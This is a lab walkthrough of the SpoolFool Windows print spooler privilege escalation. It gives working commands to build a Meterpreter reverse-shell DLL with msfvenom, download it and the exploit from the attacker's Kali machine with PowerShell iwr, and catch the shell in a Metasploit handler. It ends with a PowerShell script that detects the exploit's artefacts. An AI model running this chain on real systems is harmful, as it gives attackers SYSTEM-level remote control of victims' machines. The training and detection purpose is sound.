Exploiting Windows Machine via SpoolFool Vulnerability

Objective: To demonstrate how to exploit a Windows machine via SpoolFool vulnerability
and gain a reverse shell with escalated privileges.

Prerequisites:

● A Windows 7 machine in a virtual environment (VirtualBox)
● A Kali Linux machine in a virtual environment (VirtualBox)
● A working internet connection
● SpoolFool PoC (https://github.com/ly4k/SpoolFool) downloaded on the Kali Linux
machine

  1. First, download the PoC created by Oliver Lyak from the GitHub link given in the
     prerequisites above.
  2. Open a terminal in Kali Linux and navigate to the directory where you downloaded the
     SpoolFool files.
  3. Run ls to list the files in the directory. You should see an EXE file and a pre-made
     DLL payload.
  4. Next, compromise the Windows 7 machine and obtain a reverse shell using any method of
     your choice, such as Metasploit or manual exploitation. Once you have a shell, check
     the current user's permissions with whoami /user /groups.
  5. Now create a custom DLL using msfvenom. For this exercise the payload is a Meterpreter
     stager. Run
     msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 -f dll LHOST=IP_of_kali_machine LPORT=9501 > reverse_64bit.dll
     (replace IP_of_kali_machine with the IP address of your Kali Linux machine).
  6. Once the DLL is generated, upload it to the Windows 7 machine; we recommend using the
     C:\Users\Public directory. Start a Python web server on Kali that hosts SpoolFool.exe
     and reverse_64bit.dll from the same location, then fetch both files on Windows with the
     PowerShell cmdlet Invoke-WebRequest (iwr):
     powershell -c iwr http://IP_of_kali_machine/reverse_64bit.dll -outf \Users\Public\reverse.dll
     powershell -c iwr http://IP_of_kali_machine/SpoolFool.exe -outf \Users\Public\SpoolFool.exe
     (replace IP_of_kali_machine with the IP address of your Kali Linux machine).
  7. Before running the exploit, set up a handler in msfconsole: use multi/handler,
     set payload windows/x64/meterpreter/reverse_tcp, set LHOST IP_of_kali_machine and
     set LPORT 9501. Then run the exploit from a command prompt on the Windows 7 machine
     with SpoolFool.exe -dll reverse.dll.
  8. Once the exploit has executed, you will notice that a new directory has been created
     under %temp%\d5f5….{random name} and that a reparse point has been created which
     redirects writes into the print driver directory
     C:\Windows\system32\spool\DRIVERS\x64\4.
  9. That directory should now exist with the DLL saved in it, indicating a successful
     exploit. You should also see that the directory is writable by Everyone.
  10. Finally, start the multi/handler in msfconsole with the command run.
  11. You should now have a Meterpreter session on the Windows 7 machine. Check the current
     user's permissions again to confirm that the privileges have been escalated.
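A defender-side check for the artefacts steps 8 and 9 describe, added here as an example (it is not part of the original exercise or of the SpoolFool project): it lists reparse points under temp directories whose target resolves into the spool DRIVERS tree, and flags driver directories whose ACL grants write-class rights to broad principals. The function names and the temp roots scanned are assumptions.

```powershell
# Added detection check; not part of the original exercise or the PoC.
# Assumes an elevated PowerShell session on the host under review.
# Function names are hypothetical.

$SpoolDriverRoot = Join-Path $env:SystemRoot 'System32\spool\DRIVERS'

function Find-SpoolReparsePoints {
    # Junctions or symlinks under temp directories whose target resolves into
    # the spool DRIVERS tree (the %temp%\... -> DRIVERS\x64\4 artefact above).
    param([string[]]$Roots = @($env:TEMP, (Join-Path $env:SystemRoot 'Temp')))
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Directory -Recurse -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Attributes -band [IO.FileAttributes]::ReparsePoint } |
            ForEach-Object {
                $target = @($_.Target) -join ';'   # resolved link target(s)
                if ($target -like '*spool\DRIVERS*') {
                    [pscustomobject]@{ Path = $_.FullName; Target = $target }
                }
            }
    }
}

function Test-SpoolDriverAcl {
    # Driver directories where Everyone, Users or Authenticated Users hold
    # write-class rights; a world-writable directory under DRIVERS\x64\4 is
    # the artefact step 9 describes.
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
    $writeMask = [Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
    Get-ChildItem -LiteralPath $SpoolDriverRoot -Directory -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $dir = $_
            foreach ($ace in (Get-Acl -LiteralPath $dir.FullName).Access) {
                if ($ace.AccessControlType -eq 'Allow' -and
                    $broad -contains $ace.IdentityReference.Value -and
                    ($ace.FileSystemRights -band $writeMask)) {
                    [pscustomobject]@{
                        Path      = $dir.FullName
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
}

Find-SpoolReparsePoints | Format-Table -AutoSize
Test-SpoolDriverAcl     | Format-Table -AutoSize
```

Either list being non-empty on a host that has not had a print driver installed deliberately is worth investigating alongside the temp-directory creation and the DLL write described above.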

Note: This exercise is only for educational purposes and should be carried out in a controlled
and secured lab environment.

References:
● VirtualBox: https://www.virtualbox.org/wiki/Downloads
● Kali Linux: https://www.kali.org/downloads/
● https://www.hackingarticles.in/windows-privilege-escalation-spoolfool/
